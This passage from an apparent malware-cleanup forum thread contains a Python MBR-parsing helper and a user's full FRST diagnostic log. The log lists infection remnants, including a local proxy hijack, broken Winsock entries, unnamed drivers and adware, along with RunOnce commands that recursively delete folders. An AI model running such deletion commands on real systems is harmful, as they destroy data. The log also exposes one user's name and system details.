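TYPE_NAMES = {0x07: 'NTFS'}  # FRST names NTFS in the logs above; 0B (FAT32) is printed bare


@dataclass
class Partition:
    slot: int        # 1..4, the MBR slot, which is what FRST numbers
    active: bool
    ptype: int
    lba_start: int
    sectors: int


def build_sample_mbr() -> bytes:
    """Constructed MBR: disk ID 1549F232, slots 1, 2 and 4 used, slot 3 empty.
    Offsets and exact sector counts are assumptions chosen to round to the sizes shown."""
    boot_code = bytes(440)                       # placeholder where the real boot code lives
    entries = [
        (0x80, 0x07, 2048,      204800),         # slot 1: SYSTEM, 100 MiB, active
        (0x00, 0x07, 206848,    951519744),      # slot 2: HP (C:), about 453.7 GiB
        (0x00, 0x00, 0,         0),              # slot 3: unused
        (0x00, 0x07, 951726592, 25165824),       # slot 4: FACTORY_IMAGE, 12 GiB
    ]
    table = b''.join(
        struct.pack(ENTRY_FMT, status, b'\xfe\xff\xff' if ptype else bytes(3), ptype,
                    b'\xfe\xff\xff' if ptype else bytes(3), lba, count)
        for status, ptype, lba, count in entries)
    mbr = boot_code + struct.pack('<I', 0x1549F232) + b'\x00\x00' + table + b'\x55\xaa'
    assert len(mbr) == SECTOR
    return mbr


def parse_mbr(mbr: bytes) -> Tuple[int, List[Partition]]:
    if len(mbr) != SECTOR:
        raise ValueError('MBR must be exactly one 512-byte sector')
    if mbr[BOOT_SIG_OFF:] != b'\x55\xaa':
        raise ValueError('missing 0x55AA boot signature')
    disk_id = struct.unpack_from('<I', mbr, DISK_SIG_OFF)[0]
    parts = []
    for slot in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(ENTRY_FMT, mbr, TABLE_OFF + 16 * slot)
        if ptype == 0:
            continue  # empty slot: FRST keeps slot numbers, so an empty slot 3 yields "Partition 4"
        parts.append(Partition(slot + 1, status == 0x80, ptype, lba, count))
    return disk_id, parts


def describe(p: Partition) -> str:
    """One line in FRST's format; sizes rounded to whole MB/GB as FRST prints them."""
    nbytes = p.sectors * SECTOR
    size = f'{round(nbytes / 2**30)} GB' if nbytes >= 2**30 else f'{round(nbytes / 2**20)} MB'
    name = TYPE_NAMES.get(p.ptype)
    ptype = f'{p.ptype:02X}' + (f' {name}' if name else '')
    state = 'Active' if p.active else 'Not Active'
    return f'Partition {p.slot}: ({state}) - (Size={size}) - (Type={ptype})'


def report(mbr: bytes) -> List[str]:
    disk_id, parts = parse_mbr(mbr)
    return [f'Disk ID: {disk_id:08X}'] + [describe(p) for p in parts]


def boot_code(mbr: bytes) -> bytes:
    """Bytes a boot-code rewrite such as bootrec /FixMbr replaces."""
    return mbr[:DISK_SIG_OFF]


def partition_area(mbr: bytes) -> bytes:
    """Disk signature plus partition table: the bytes such a rewrite must leave intact."""
    return mbr[DISK_SIG_OFF:BOOT_SIG_OFF]


def rewrite_boot_code(mbr: bytes, new_code: bytes) -> bytes:
    """Model of a boot-code-only rewrite: everything from the disk signature on is preserved."""
    if len(new_code) != DISK_SIG_OFF:
        raise ValueError('boot code area is 440 bytes')
    return new_code + mbr[DISK_SIG_OFF:]


if __name__ == '__main__':
    sample = build_sample_mbr()
    print('\n'.join(report(sample)))
    fixed = rewrite_boot_code(sample, b'\x90' * 440)
    print('partition table preserved:', partition_area(fixed) == partition_area(sample))
```

When checking a disk before and after a boot-code repair, the useful comparison is the two ranges the helpers above return: `boot_code()` is expected to change, `partition_area()` is not. If the partition area differs, something other than a plain `/FixMbr` wrote to the sector.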
     
  14. TwinHeadedEagle

    OK, we need to settle a few more things and check for malware remnants.


    Now run FRST from Normal mode and attach a fresh report. Make sure to check Addition.txt before Scan...
     
  15. Mr.LucianoSno

    Here is the fresh report

    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-11-2013
    Ran by Fabian Zayas (administrator) on THEFACTORY on 02-12-2013 05:12:15
    Running from F:\
    Windows 7 Home Premium (X64) OS Language: English(US)
    Internet Explorer Version 9
    Boot Mode: Normal

    ==================== Processes (Whitelisted) =================

    (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
    (Digidesign, A Division of Avid Technology, Inc.) C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe
    (Hewlett-Packard Company) c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
    (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
    (Protexis Inc.) c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRService.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
    (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
    (M-Audio) C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe
    (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe
    (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    (Microsoft Corporation) c:\Program Files\Microsoft Security Client\NisSrv.exe
    (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
    (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
    (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
    (Google Inc.) C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe
    (Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRServer.exe
    (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\SERVER\SRFeature.exe
    (CyberLink Corp.) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
    (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe

    ==================== Registry (Whitelisted) ==================

    HKLM\...\Run: [NvCplDaemon] - RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-08-12] (Microsoft Corporation)
    HKLM-x32\...\Runonce: [ExpressZipUninstall] - cmd.exe /C rmdir /S /Q "C:\Program Files (x86)\NCH Software\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall2] - cmd.exe /C rmdir /Q "C:\Program Files (x86)\NCH Software\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall3] - cmd.exe /C rmdir /S /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software\Program Files\ExpressZip" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall4] - cmd.exe /C rmdir /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software\Program Files" [x]
    HKLM-x32\...\Runonce: [ExpressZipUninstall5] - cmd.exe /C rmdir /Q "C:\Users\Fabian Zayas\AppData\Roaming\NCH Software" [x]
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKCU\...\Run: [Google Update] - C:\Users\Fabian Zayas\AppData\Local\Google\Update\GoogleUpdate.exe [136176 2012-02-03] (Google Inc.)
    MountPoints2: {79acb9ca-4def-11e0-a327-90e6ba954105} - L:\LaunchU3.exe -a
    SSODL: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\system32\SSCbFsMntNtf3.dll (EldoS Corporation)
    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\SysWOW64\SSCbFsMntNtf3.dll (EldoS Corporation)

    ==================== Internet (Whitelisted) ====================

    ProxyServer: http=127.0.0.1:58687
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=U040&ocid=U040DHP&dt=080813
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    StartMenuInternet: IEXPLORE.EXE - %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
    SearchScopes: HKLM - DefaultScope {3402CC29-EC9D-4FF3-8647-077679973A5B} URL = http://www.bing.com/search?q={searchTerms}&FORM=HPDTDF&pc=HPDTDF&src=IE-SearchBox
    SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    SearchScopes: HKLM-x32 - DefaultScope {3402CC29-EC9D-4FF3-8647-077679973A5B} URL = http://www.bing.com/search?q={searchTerms}&FORM=HPDTDF&pc=HPDTDF&src=IE-SearchBox
    SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    SearchScopes: HKCU - DefaultScope {40419C19-01BD-D42C-3B25-A639D6F21B1C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
    SearchScopes: HKCU - {40419C19-01BD-D42C-3B25-A639D6F21B1C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
    SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
    SearchScopes: HKCU - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
    BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\microsoft shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
    BHO-x32: No Name - {9D425283-D487-4337-BAB6-AB8354A81457} - No File
    BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
    BHO-x32: Microsoft Live Search Toolbar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - C:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
    Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} - No File
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
    Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
    Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    DPF: HKLM {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.7.cab
    DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
    Winsock: Catalog5 02 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5-x64 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
    Winsock: Catalog5-x64 02 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

    FireFox:
    ========
    FF ProfilePath: C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default
    FF NetworkProxy: "http", "127.0.0.1"
    FF NetworkProxy: "http_port", 58687
    FF NetworkProxy: "type", 1
    FF DefaultSearchEngine: Bing
    FF SelectedSearchEngine: Bing
    FF SearchEngineOrder.3: Bing
    FF Keyword.URL: hxxp://www.bing.com/search?FORM=U040DF&PC=U040&dt=080813&q=
    FF Homepage: hxxp://www.msn.com/?pc=U040&ocid=U040DHP&dt=080813
    FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_224.dll ()
    FF Plugin: @microsoft.com/GENUINE - disabled No File
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll ()
    FF Plugin-x32: @java.com/DTPlugin,version=10.9.2 - C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=10.9.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @facebook.com/FBPlugin,version=1.0.3 - C:\Users\Fabian Zayas\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll No File
    FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Fabian Zayas\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Fabian Zayas\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF SearchPlugin: C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default\searchplugins\bingp.xml
    FF Extension: I Want This - C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default\Extensions\crossriderapp2258@crossrider.com
    FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn\

    Chrome:
    =======
    CHR HomePage: hxxp://www.google.com/
    CHR RestoreOnStartup: "hxxp://www.google.com/"
    CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
    CHR Plugin: (Native Client) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\ppGoogleNaClPluginChrome.dll ()
    CHR Plugin: (Chrome PDF Viewer) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\pdf.dll ()
    CHR Plugin: (Shockwave Flash) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\gcswf32.dll No File
    CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll No File
    CHR Plugin: (Download Manager) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cbngmhdomibdionpoibpjdkloeggblgi\1.0_0\npDownloadManager.dll No File
    CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
    CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
    CHR Plugin: (Java(TM) Platform SE 6 U26) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File
    CHR Plugin: (Windows Live\u0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll No File
    CHR Plugin: (BrowserPlus (from Yahoo!) v2.9.8) - C:\Users\Fabian Zayas\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll No File
    CHR Plugin: (Facebook Plugin) - C:\Users\Fabian Zayas\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll No File
    CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll No File
    CHR Extension: (Google Drive) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0
    CHR Extension: (YouTube) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0
    CHR Extension: (Adblock Plus) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.6.1_0
    CHR Extension: (Google Search) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0
    CHR Extension: (Sketchpad) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkllajgbhondgjjnhmmgbjndmogapinp\1.0.0.4_0
    CHR Extension: () - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\llaficoajjainaijghjlofdfmbjpebpa\4.3.3_0
    CHR Extension: (Chrome In-App Payments service) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_1
    CHR Extension: (WeVideo - Video Editor and Maker) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\okgjbfikepgflmlelgfgecmgjnmnmnnb\3.3.3_0
    CHR Extension: (OneClick Cleaner for Chrome) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\oncckmaelaecccmaniihojgeopkcajfh\0.9.0.7_0
    CHR Extension: (Gmail) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1
    CHR Extension: (RSS Feed Reader) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp\5.2.0_0
    CHR HKLM-x32\...\Chrome\Extension: [mpfapcdfbbledbojijcbcclmlieaoogk] - C:\Users\Fabian Zayas\AppData\Local\I Want This\Chrome\I Want This.crx

    ==================== Services (Whitelisted) =================

    R2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    R2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    R2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    R3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-13] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-08] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    R3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-15] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-15] (Digidesign, A Division of Avid Technology, Inc.)
    R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    R3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    U4 eqcpqxgh;
    U4 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;
    U4 rgqxleuo;

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-12-02 04:02 - 2013-12-02 04:02 - 00296704 _____ C:\Windows\Minidump\120213-20888-01.dmp
    2013-11-21 04:07 - 2013-11-21 04:07 - 00000000 ____D C:\FRST
    2013-11-19 23:00 - 2013-11-19 23:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 23:00 - 2013-11-19 23:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 22:58 - 2013-11-19 22:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 22:41 - 2013-11-19 22:41 - 00000000 ____D C:\Windows\system32\MpEngineStore
    2013-11-08 09:51 - 2013-11-08 09:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp

    ==================== One Month Modified Files and Folders =======

    2013-12-02 04:58 - 2012-02-03 10:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-12-02 04:52 - 2013-03-07 01:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-12-02 04:44 - 2009-07-13 23:45 - 00015792 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-12-02 04:44 - 2009-07-13 23:45 - 00015792 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-12-02 04:41 - 2011-02-15 22:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-12-02 04:37 - 2009-10-31 04:17 - 01425841 _____ C:\Windows\WindowsUpdate.log
    2013-12-02 04:28 - 2013-04-01 03:54 - 00000000 ____D C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
    2013-12-02 04:25 - 2011-11-06 06:34 - 00000000 ___HD C:\ProgramData\NCH Software
    2013-12-02 04:25 - 2011-11-06 06:34 - 00000000 ____D C:\Program Files (x86)\NCH Software
    2013-12-02 04:22 - 2013-04-01 03:47 - 00000000 ____D C:\Program Files (x86)\Bonjour
    2013-12-02 04:22 - 2011-09-02 19:54 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
    2013-12-02 04:22 - 2011-09-02 19:52 - 00000000 ____D C:\Program Files (x86)\Image-Line
    2013-12-02 04:14 - 2009-07-14 00:13 - 00726444 _____ C:\Windows\system32\PerfStringBackup.INI
    2013-12-02 04:08 - 2011-02-15 22:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-12-02 04:07 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-12-02 04:07 - 2009-07-13 23:51 - 00191993 _____ C:\Windows\setupact.log
    2013-12-02 04:02 - 2013-12-02 04:02 - 00296704 _____ C:\Windows\Minidump\120213-20888-01.dmp
    2013-12-02 04:02 - 2010-01-29 10:38 - 759066500 _____ C:\Windows\MEMORY.DMP
    2013-12-02 04:02 - 2010-01-29 10:38 - 00000000 ____D C:\Windows\Minidump
    2013-12-01 22:08 - 2010-01-20 00:39 - 00000000 ____D C:\Users\Fabian Zayas
    2013-11-21 04:07 - 2013-11-21 04:07 - 00000000 ____D C:\FRST
    2013-11-21 03:13 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 23:00 - 2013-11-19 23:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 23:00 - 2013-11-19 23:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
